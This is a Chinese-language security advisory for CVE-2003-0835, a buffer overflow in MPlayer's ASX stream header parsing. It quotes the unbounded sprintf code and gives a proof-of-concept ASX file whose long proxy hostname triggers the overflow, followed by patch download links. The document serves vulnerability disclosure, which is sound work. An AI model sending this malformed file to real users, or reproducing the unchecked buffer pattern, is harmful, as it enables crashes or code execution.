安全研究
安全漏洞
MPlayer流ASX头字段解析缓冲区溢出漏洞
发布日期:2003-09-25
更新日期:2003-10-09
受影响系统:
MPlayer MPlayer 1.0 pre1不受影响系统:
MPlayer MPlayer 0.90 rc4
MPlayer MPlayer 0.90 rc series
MPlayer MPlayer 0.90 pre series
MPlayer MPlayer 0.90
MPlayer MPlayer 0.91
- Mandrake Linux 9.2
MPlayer MPlayer 0.92描述:
BUGTRAQ ID: 8702
CVE(CAN) ID: CVE-2003-0835
MPlayer是一款基于Linux的电影播放程序。
MPLayer在处理畸形流ASX文件头字段时存在问题,远程攻击者可以利用这个漏洞诱使用户访问畸形ASX文件,触发缓冲区溢出。
问题是asf_streaming.c文件中包含的asf_http_request函数缺少正确的边界缓冲区检查,问题代码如下:
asf_http_request {
char str[250];
....
...
..
sprintf( str, "Host: %s:%d", server_url->hostname,
server_url->port );
....
...
..
sprintf( str, "Host: %s:%d", url->hostname, url->port );
....
...
..
}
由于MAXHOSTLEN对主机长度进行了限制,看起来不可利用,但是如果使用包含"badsite" 监听"badport"的ASX文件,可触发缓冲区溢出,精心构建请求ASX文件,并诱使用户解析,可导致以用户进程权限在系统上执行任意指令。
<*来源:Otero, Hernan (hernan.otero@eds.com)
链接:http://www.mplayerhq.hu/homepage/design6/news.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<asx version = "3.0">
<title>Bas Site ASX</title>
<moreinfo href = "mailto:info badsite com
<mailto:info badsite com> " />
<logo href = "http://www.badsite.com/streaming/grupo.gif
<http://www.badsite.com/streaming/grupo.gif> " style="ICON" />
<banner href= "images/bannermitre.gif">
<abstract>Bad Site live</abstract>
<moreinfo target="_blank" href = "http://www.badsite.com/
<http://www.badsite.com/> " />
</banner>
<entry>
<title>NEWS</title>
<AUTHOR>NEWS</AUTHOR>
<COPYRIGHT>? All by the news</COPYRIGHT>
<ref href =
"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa"/>
<logo href = "http://www.badsite.com/streaming/grupo.gif
<http://badsite.com/streaming/grupo.gif> " style="ICON" />
</entry>
</asx>
建议:
厂商补丁:
MPlayer
-------
下载MPlayer 0.92或者最新CVS更新修正了此漏洞:
Hungary 1, HTTP -> http://www1.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
Hungary 1, FTP -> ftp://ftp1.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
Hungary 2, HTTP -> http://www2.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
Hungary 2, FTP -> ftp://ftp2.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
USA, HTTP -> http://ftp3.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
USA, FTP -> ftp://ftp3.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
Switzerland, HTTP -> http://www4.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
USA2, HTTP -> http://ftp5.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
USA2, FTP -> ftp://ftp5.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
Australia, FTP -> ftp://ftp6.mplayerhq.hu/pub/mplayer/releases/MPlayer-0.92.tar.bz2
Finland, HTTP -> http://www7.mplayerhq.hu/pub/mplayer/releases/MPlayer-0.92.tar.bz2
浏览次数:3190
严重程度:0(网友投票)
绿盟科技给您安全的保障